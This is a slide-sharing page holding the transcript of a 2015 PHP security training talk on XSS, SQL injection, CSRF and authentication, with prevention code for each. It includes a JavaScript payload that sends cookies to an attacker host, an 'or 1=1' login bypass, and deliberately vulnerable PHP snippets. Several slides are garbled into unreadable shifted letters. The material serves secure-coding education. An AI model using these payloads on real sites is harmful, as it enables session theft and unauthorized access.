Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Secure PHP Bootcamp

Avatar for Chris Cornutt Chris Cornutt
January 23, 2015
Technology
0
670

Secure PHP Bootcamp

Given at PHP Benelux 2015

Avatar for Chris Cornutt

Chris Cornutt

January 23, 2015
Tweet

More Decks by Chris Cornutt

See All by Chris Cornutt
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
160
Pentesting for Developers
Avatar for Chris Cornutt ccornutt
0
160
Securing Legacy Applications - Longhorn PHP 2018
Avatar for Chris Cornutt ccornutt
1
210
Pieces of Auth
Avatar for Chris Cornutt ccornutt
0
360
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
540
Build Security In
Avatar for Chris Cornutt ccornutt
0
230
Introduction to Slim 3
Avatar for Chris Cornutt ccornutt
0
180
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
32
PHP Security, Redfined
Avatar for Chris Cornutt ccornutt
0
300

Other Decks in Technology

See All in Technology
いま注目しているデータエンジニアリングの論点
Avatar for Ikki Miyazaki ikkimiyazaki
0
460
【新卒研修資料】LLM・生成AI研修 / Large Language Model・Generative AI
Avatar for BrainPad brainpadpr
18
9.2k
データ民主化を加速する仕組み作り -BigQuery Sharing の活用-
Avatar for PLAID Tech plaidtech
PRO
0
140
Pure Goで体験するWasmの未来
Avatar for asuka askua
1
140
Sidekiq その前に:Webアプリケーションにおける非同期ジョブ設計原則
Avatar for morihirok morihirok
16
5.8k
OCI Network Firewall 概要
Avatar for oracle4engineer oracle4engineer
PRO
1
7.7k
Goを使ってTDDを体験しよう!
Avatar for chiroruxx chiroruxx
1
190
避けられないI/O待ちに対処する:
Rails アプリにおけるSSEとasync gemの活用 / Tackling Inevitable I/O Latency in Rails Apps with SSE and the async gem
Avatar for moznion moznion
2
1.6k
非エンジニアのあなたもできる&もうやってる!コンテキストエンジニアリング
Avatar for ファインディ株式会社(イベント資料アップ用) findy_eventslides
3
750
PLaMoの事後学習を支える技術 / PFN LLMセミナー
Avatar for Preferred Networks pfn
PRO
1
170
Deep Research と NotebookLM を使い倒す!レガシーリプレイスの技術選定と学習コスト削減術
Avatar for tet0-h tet0h
0
2.4k
Where does my memory come from?
Avatar for Kernel Recipes ennael
PRO
0
120

Featured

See All Featured
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
Avatar for Tammy Everts tammyeverts
53
3k
Fantastic passwords and where to find them - at NoRuKo
Avatar for Phil Nash philnash
52
3.4k
Designing for Performance
Avatar for Lara Hogan lara
610
69k
Documentation Writing (for coders)
Avatar for Carmen Chung carmenintech
75
5k
For a Future-Friendly Web
Avatar for Brad Frost brad_frost
180
9.9k
What’s in a name? Adding method to the madness
Avatar for Product Marketing Alliance productmarketing
PRO
23
3.7k
How to Ace a Technical Interview
Avatar for Jacob Kaplan-Moss jacobian
280
23k
Automating Front-end Workflow
Avatar for Addy Osmani addyosmani
1371
200k
jQuery: Nuts, Bolts and Bling
Avatar for Doug Neiner dougneiner
64
7.9k
Designing Experiences People Love
Avatar for Jonathan Moore moore
142
24k
Learning to Love Humans: Emotional Interface Design
Avatar for Aarron Walter aarron
274
40k
The MySQL Ecosystem @ GitHub 2015
Avatar for Sam Lambert samlambert
251
13k

Transcript

  1. Secure PHP Development $ISJT$PSOVUU!FOZHNB

  2. https://jetbrains.com

  3. Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT

  4. 1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN

  5. IUUQCJUMZPXBTQUPQ

  6. 5IFSF`T OPTVDIUIJOH BTTFDVSF

  7. IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO

  8. IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN

  9. None

  10. XSS: Cross Site Scripting

  11. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH

  12. Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>

  13. Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);

    xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG

  14. Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );

    echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

  15. Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)

    }} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH

  16. SQLi: SQL Injection

  17. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH

  18. Example $sql = ‘select id from users where username =

    “‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #

  19. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH

  20. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X

  21. Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where

    username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

  22. CSRF: Cross Site Request Forgery

  23. VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF  TJNQMF SBOEPNJ[FE GPSFBDIGPSN

  24. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> </form>

  25. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>

  26. Auth*: Authentication & Authorization

  27. EJSFDUPCKFDUSFGFSFODF "  EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU

  28. QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT

  29. None
  30. None

  31. And…

  32. 4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

  33. 5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN